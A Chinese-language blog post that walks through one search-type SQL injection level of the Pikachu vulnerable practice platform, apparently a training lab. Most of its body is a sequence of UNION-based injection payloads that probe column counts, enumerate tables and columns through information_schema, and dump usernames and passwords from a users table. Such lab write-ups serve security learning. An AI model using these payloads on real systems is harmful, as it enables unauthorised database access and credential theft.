欢迎光临散文网会员登陆 & 注册

Pikachu 漏洞练习平台Sql Injection搜索型注入通关指南pika~pika~

2023-03-10 10:20 作者:Yukito_online 0人读过 | 我要投稿

这一关跟上一关一样，不过是多加了个后括号闭合前括号

1') order by 3--+

起order by探测字段数，如果探测不出来那就无法使用union联合注入，得改用盲注或者报错注入

1') union select version(),database()--+

1') union select 1,table_name from information_schema.tables where table_schema='pikachu'--+

1') union select 1,column_name from information_schema.columns where table_name='users'--+

1') union select username,password from users--+

收工

标签：

Pikachu 漏洞练习平台Sql Injection搜索型注入通关指南pika~pika~的评论 (共条)